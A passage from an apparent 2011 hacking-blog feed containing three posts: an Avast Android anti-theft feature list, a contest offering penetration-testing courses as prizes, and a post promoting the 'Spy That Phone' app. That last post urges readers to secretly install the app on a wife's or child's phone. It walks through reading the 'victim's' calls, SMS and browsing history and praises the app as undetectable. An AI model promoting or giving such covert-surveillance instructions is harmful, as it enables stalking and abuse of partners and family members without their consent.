&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Trusted SIM Cards List&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Establish a ‘white list’ of approved SIM cards that can be used in the phone without triggering a theft alert. You can also easily clear the trusted SIM cards list, to leave the one present in the phone as the only trusted one.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Remote Settings Change&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;A setup wizard guides the user through the installation process on rooted phones. No command-line knowledge is necessary to install Anti-Theft rooted. Also supports upgrading.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Remote Features&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;SMS commands provide you the following REMOTE options for your ‘lost’ (or stolen) phone:&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Siren, Lock, custom Display properties, Locate, Memory Wipe, covert Calling, Forwarding, “Lost” Notification, SMS Sending, History, Restart, and more.&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Video &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 577px;"&gt;&lt;param name="movie" value="https://www.youtube.com/v/sVzou1P68I8?version=3&amp;feature=player_embedded"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="https://www.youtube.com/v/sVzou1P68I8?version=3&amp;feature=player_embedded" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="577" height="360"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Download Free Android Security Software Avast Antivirus &lt;b&gt;&lt;a href="http://thehackernews.com/2011/12/best-free-android-security-software.html"&gt;here&lt;/a&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-3688546292491803874?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=2DYtkDX8EwQ:uhBsRH4a-8c:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=2DYtkDX8EwQ:uhBsRH4a-8c:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=2DYtkDX8EwQ:uhBsRH4a-8c:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=2DYtkDX8EwQ:uhBsRH4a-8c:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=2DYtkDX8EwQ:uhBsRH4a-8c:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=2DYtkDX8EwQ:uhBsRH4a-8c:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=2DYtkDX8EwQ:uhBsRH4a-8c:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=2DYtkDX8EwQ:uhBsRH4a-8c:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=2DYtkDX8EwQ:uhBsRH4a-8c:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=2DYtkDX8EwQ:uhBsRH4a-8c:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=2DYtkDX8EwQ:uhBsRH4a-8c:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/2DYtkDX8EwQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3688546292491803874/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/12/download-free-android-security-software.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3688546292491803874?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3688546292491803874?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/2DYtkDX8EwQ/download-free-android-security-software.html" title="Download Free Android Security Software Avast Antivirus" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-BOGZHDieKPM/Tvcr0C0u3-I/AAAAAAAABnE/c0GEG5xxi8g/s72-c/unnamed.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/12/download-free-android-security-software.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DU4BR3Y_eyp7ImA9WhRVEEg.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-7593887442865250648</id><published>2011-12-19T11:10:00.000-08:00</published><updated>2012-01-08T13:25:56.843-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-08T13:25:56.843-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="contests" /><title>December 2011 Contest Sponsor For RHA - elearnSecurity</title><content type="html">&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;i&gt;Contest Closed - Winners Announced &lt;a href="http://www.rafayhackingarticles.net/2012/01/winners-announced-december-2011-contest.html"&gt;here&lt;/a&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i style="font-weight: bold;"&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Yf4kou4LKhI/Tt4XAVimPbI/AAAAAAAABlU/b2_MzMzT6Ms/s1600/logo_full.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-Yf4kou4LKhI/Tt4XAVimPbI/AAAAAAAABlU/b2_MzMzT6Ms/s1600/logo_full.png" /&gt;&lt;/a&gt;&lt;/div&gt;Due to a tremendous response of readers and huge number of participants of the last contest &lt;b&gt;"Vote for RHA and Win Facebook Hacking Course"&lt;/b&gt;, we decided to setup another contest for RHA readers. &amp;nbsp;We have partnered with &lt;b&gt;ElearnSecurity.net &lt;/b&gt;and arranged a contest for our readers, The winners will be handed over with prizes worth up to 1400$.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;Rewards&lt;/b&gt;&lt;/h4&gt;Before we inform you about the Contest participation details, We would like you to know about the rewards and prizes which the winners will get their hands On.&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;[1ST PRIZE] Pentesting Pro Course [Worth 600$]&lt;/b&gt;&lt;/h4&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-1eBB1LTThec/Tt3wKU9Z9II/AAAAAAAABlE/XzpKXPerVk4/s1600/box__prosmall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-1eBB1LTThec/Tt3wKU9Z9II/AAAAAAAABlE/XzpKXPerVk4/s1600/box__prosmall.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Pentesting PRO course is developed for ones who have some knowledge related to &lt;b&gt;&lt;a href="http://rafayhackingarticles.net/"&gt;Ethical hacking and Penetration testing&lt;/a&gt;&lt;/b&gt; but would like to take their knowledge to the next level. In order to understand what's inside the Pentesting PRO course, I have conducted a short interview with the lead Instructor Mr.Armando.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What's the main difference b/w The Student Course And PRO Course?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;The Student course has been created for someone completely new to penetration testing. We bring the student on basics on both aspects. The Student course aims at making the student comfortable with the Penetration testing process, its methodologies, from Information gathering to exploitation and teaching how to use the most important tools.&amp;nbsp;Last but not least, I don't think there's another course with a more enjoyable learning experience than our course for beginners.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;The Professional course is for someone with an experience in information security and un understanding of what penetration testing is. It's an extremely in depth course with a 100% hands on certification at the end. This course has been authored by three instructors and covers three &lt;/i&gt;&lt;i&gt;sections: System Security, Network Security and Web application security.&amp;nbsp;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;For each of these sections the students will learn the most modern techniques professional penetration testers use to audit and exploit a local or a remote network.&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;You and me both know that, Pentesting In real world is far more difficult, Does your course provides the students to tackle in the realworld situations?.&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Definitely. To get your eCPPT certification you not only have to perform areal penetration test, but you also have to produce a commercial grade report. We teach how to create an excellent report that speaks to the different levels of the client organization.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;This is what happens in the real world and we tried to bring the real world into a certification exam, with great results so far.&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What if some one has Zero knowledge related to Ethical hacking and Penetration testing?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;Everyone at some point has zero knowledge on something. We don't claim to make anyone the no.1 hacker in the world by enrolling in our courses. However I know that this is the hardest job in the world and only a few manage to get a job in this field.&amp;nbsp;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;What you will need is perseverance, curiosity and a proven learning path.We can't do much about the first two but I can tell we provide great material and proven learning path.This minimizes the struggle that any beginner faces during early times and drastically increases the chances for him to succeed.In fact we have a big success rate among our beginners.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;What could be the maximum level that a Student Achieve After completing both of Your Courses?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;We have had students finding a job as Junior pentesters or advancing theircareers as Senior pentesters. Moreover with our labs, the students feels empowered with readily usable skills that can use in the everyday job.This is life changing in some way.&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;[2ND PRIZE] Pentesting Beginners Course Student [Worth 400$]&lt;/b&gt;&lt;/h4&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-U1yjvBuZhEc/Tt3vO1boQgI/AAAAAAAABk8/caddPm6Udb0/s1600/box_student.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-U1yjvBuZhEc/Tt3vO1boQgI/AAAAAAAABk8/caddPm6Udb0/s1600/box_student.png" /&gt;&lt;/a&gt;&lt;/div&gt;We have already discussed about the Elearnsecurity student course in our previous post&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/12/elearn-security-beginners-course-for.html"&gt;&amp;nbsp;Elearn Security Beginners Course For Penetration Testers&lt;/a&gt;&lt;/b&gt;.&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;[3RD PRIZE] Pentesting Labs [RANDOM] [Worth 400$]&lt;/b&gt;&lt;/h4&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-vpPw5ECTa2Q/Tt3yS2ecUQI/AAAAAAAABlM/6AF5mXVBFs4/s1600/hacklab.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="285" src="http://4.bp.blogspot.com/-vpPw5ECTa2Q/Tt3yS2ecUQI/AAAAAAAABlM/6AF5mXVBFs4/s400/hacklab.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
The winner will get 30 days access to the VPN labs. You will thrown into a real world environment where you can practice what you learned in the Penetration testing PRO course.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Discount&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Every one participating in the contest will get &lt;i&gt;&lt;b&gt;5% off &lt;/b&gt;&lt;/i&gt;on every thing he purchases from elearnsecurity before the 31st december.&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;How To&amp;nbsp;Participate?&lt;/b&gt;&lt;/h4&gt;&lt;b&gt;Here is how you can particapte in the contest:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;First of all you need to like our page &lt;a href="http://facebook.com/rafayhackingarticles"&gt;&lt;b&gt;http://facebook.com/rafayhackingarticles&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2.&lt;/b&gt; Next you need to share this page with your friends on Facebook, Twitter, Digg, Delicious, yahoo groups, facebook groups, like page etc.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3. &lt;/b&gt;Lastly you would need to post a comment telling us briefly &lt;b&gt;"Why Do You think, you Should Be The One Who Should Be Choosen As A Winner"&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;How To Win?&lt;/b&gt;&lt;/h4&gt;&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;&lt;i&gt;[First Prize]&amp;nbsp;The person with the most number of shares and the most impressive answer to the above question will win the first prize of penetration testing pro course.&lt;br /&gt;
&lt;br /&gt;
[Second Prize] The person with the second most number of shares and an impressive answer to the question will win&lt;/i&gt;&lt;/span&gt; &lt;br /&gt;
Note: The answer carries more weight than your shares, which means that if you have the most shares and not a very impressive answer, You may move to the second and third position.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[Third Prize]&lt;/b&gt;The third prize will be&amp;nbsp;chosen&amp;nbsp;via a lucky draw,&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Here is an example:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;&lt;i&gt;Hello my name is "ABC", My email address is abc@gmail.com, I have liked your page and have shared this post on following places:&lt;br /&gt;
&lt;br /&gt;
My Facebook Profile : http://facebook.com/risepk&lt;br /&gt;
My FanPage Profile with 1,437 fans : http://facebook.com/risepks&lt;br /&gt;
My Google + Profile : http://gplus.to/risepk&lt;br /&gt;
My Tumblr BLog : http://risepk.tumblr.com&lt;br /&gt;
My Twitter Profile having 557 followers : http://twitter.com/risepk&lt;br /&gt;
My Linked in Profile : http://pk.linkedin.com/in/risepk&lt;br /&gt;
My Stumble Profile : http://www.stumbleupon.com/stumbler/risepk/all/&lt;br /&gt;
My Digg Profile : http://digg.com/faizmuhammadkhan&lt;br /&gt;
My Delicious profile : http://www.delicious.com/risepk&lt;br /&gt;
&lt;br /&gt;
I would like to be choosen as a winner because &amp;lt;Your Answer&amp;gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;When will the winners be announced?&lt;/b&gt;&lt;/h4&gt;&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;&amp;nbsp;The winners will probably announced some where b/w 2nd January 2012 and 5th January 2012. We would like to wish every one best of luck.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-7593887442865250648?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FP5dTCqK48E:oeUdACNj9cw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FP5dTCqK48E:oeUdACNj9cw:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FP5dTCqK48E:oeUdACNj9cw:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FP5dTCqK48E:oeUdACNj9cw:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FP5dTCqK48E:oeUdACNj9cw:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FP5dTCqK48E:oeUdACNj9cw:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FP5dTCqK48E:oeUdACNj9cw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FP5dTCqK48E:oeUdACNj9cw:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FP5dTCqK48E:oeUdACNj9cw:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FP5dTCqK48E:oeUdACNj9cw:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FP5dTCqK48E:oeUdACNj9cw:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/FP5dTCqK48E" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/7593887442865250648/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/12/december-2011-contest-sponsor-for-rha.html#comment-form" title="42 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7593887442865250648?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7593887442865250648?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/FP5dTCqK48E/december-2011-contest-sponsor-for-rha.html" title="December 2011 Contest Sponsor For RHA - elearnSecurity" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-Yf4kou4LKhI/Tt4XAVimPbI/AAAAAAAABlU/b2_MzMzT6Ms/s72-c/logo_full.png" height="72" width="72" /><thr:total>42</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/12/december-2011-contest-sponsor-for-rha.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0cBQngzfyp7ImA9WhRXEEs.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8344827735353612395</id><published>2011-12-16T11:50:00.000-08:00</published><updated>2011-12-16T11:50:53.687-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-16T11:50:53.687-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Parental Control softwares" /><title>How To Spy On Android Phones – Spy That Phone App Review [Android]</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-quCjTYVqR5E/Tuug7ZsSfKI/AAAAAAAABmc/ND6OphetWmM/s1600/spying-cellphone.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-quCjTYVqR5E/Tuug7ZsSfKI/AAAAAAAABmc/ND6OphetWmM/s320/spying-cellphone.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
You might get caught in many situations where you have to break in to the privacy of your family member like Kid or Wife just to make sure, nothing is wrong with their life &amp;amp; eventually yours too !&amp;nbsp;Wheather it is an doubt about your son/daughter getting with wrong group of friends or about your girlfriend or wife having affair or whatsoever reason, you might want to spy in to their phones.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
There is an amazing Android App I would like to share which keeps your stress away by spying the smartphone of your wife and kids to make sure you are happy in life – Spy That Phone.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Spy That Phone&lt;/b&gt; is an android app that is not just easy to install on mobile phone of victim but also to access their personal data like – calls, sms, web history and calender events.&lt;br /&gt;
&lt;br /&gt;
All you have to do is install the spy app on mobile phone of your kids or wife and app will start giving you all data on web account.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How Does Mobile Spy App – ‘Spy That Phone’ Works ?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
Its pretty simple, let me explain step by step.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt; Download  &amp;amp; Install the app on persons phone who you wish to spy on to. ( Make sure it is an Android smartphone.)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;img height="347px;" id="internal-source-marker_0.04875800386071205" src="https://lh4.googleusercontent.com/AFM_Dp1uMr59DJYBlw4oxjY40QkBIixdUCePP1HxxMJa2PpO6SDLriNnZlYbH24AglFgwue35HlF2z43YS1r8RXGq2ELs94UkVQNF7P7aBnDvVpj6QE" width="560px;" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;You’ll get information about logging in to web interface. Just use your login ID &amp;amp; password and you are in to your control panel, where you can see all the spied information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;img height="347px;" id="internal-source-marker_0.04875800386071205" src="https://lh3.googleusercontent.com/HgjEIh8Qx7AdpNj6U3ey9YH31dJ4n7m9mkLvcFr5vdO_EhlkJ-VpVpAj8rme2opwKR3ghtd7K-3gu5YXxqcU_-35ls-0CaOoToyFHKeq51MwfaoWf_s" width="560px;" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;3. &lt;/b&gt;Now You can Check all Call logs with details on timing, number, call duration etc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;img height="347px;" id="internal-source-marker_0.04875800386071205" src="https://lh4.googleusercontent.com/29VJVmnL9Xd0ko1uog7uNQsiWIaRnj2BoCaQ_4qZt3PYkcOW9hj_iNhAxLJZE81cSVNws_fWZxmOF0fiU2JfJ7ozT1VJGiKWPoZorE8GpxGj6ejm4Ng" width="560px;" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4. &lt;/b&gt; All SMS content with full details.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;img height="347px;" id="internal-source-marker_0.04875800386071205" src="https://lh4.googleusercontent.com/_Ho4uVnPVvlTKcA_sEwaBgEu5bd5DAoyylZZ5ZvSug6YiZYKXi5oeXln98AkMTq6F7FGFNLICfzcbZQXrLoUaFsCR25GgjMNWofUZO1MCfQ-B78-2vo" width="560px;" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;5. &lt;/b&gt;Web Search History &amp;amp; So on…&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Benefits of using Spy That Phone App&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt; The App is hevaily disguised &amp;amp; it is highly impossible to get detected by victim or by any program. There are no traces left on smartphone at all.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;App is very stable &amp;amp; No force close or any errors that goes suspicious due to app. You can trust 100% on its stability.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3.&lt;/b&gt; Logs are stored on could. So you don’t have to store it somewhere on your PC or mobile. You can get access to all logs anytime &amp;amp; anywhere with the help of internet connection.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4.&lt;/b&gt; Support for app is world class, you can ask as many questions &amp;amp; get a personal help from support team and developer themselves. All issues will be sorted our in record time &amp;amp; you do not have to worry about technical difficulties. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;5.&lt;/b&gt; Cost is lowest as possible –  You can compare this app cost with any other spy mobile apps in the market right now, They have made it available at lowest cost with better quality &amp;amp; efficiency.&lt;br /&gt;
&lt;br /&gt;
I have used this app personally &amp;amp; trust me there is no better spy mobile app that will manage all your worries about wife and kids at such a low investment.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;a href="http://tinyurl.com/bn96yh5"&gt;Click here to visit the website of Spy That Phone Android App&lt;/a&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-8344827735353612395?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=MI8dd-6Q5Es:0ConvXxDaFo:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=MI8dd-6Q5Es:0ConvXxDaFo:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=MI8dd-6Q5Es:0ConvXxDaFo:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=MI8dd-6Q5Es:0ConvXxDaFo:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=MI8dd-6Q5Es:0ConvXxDaFo:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=MI8dd-6Q5Es:0ConvXxDaFo:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=MI8dd-6Q5Es:0ConvXxDaFo:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a 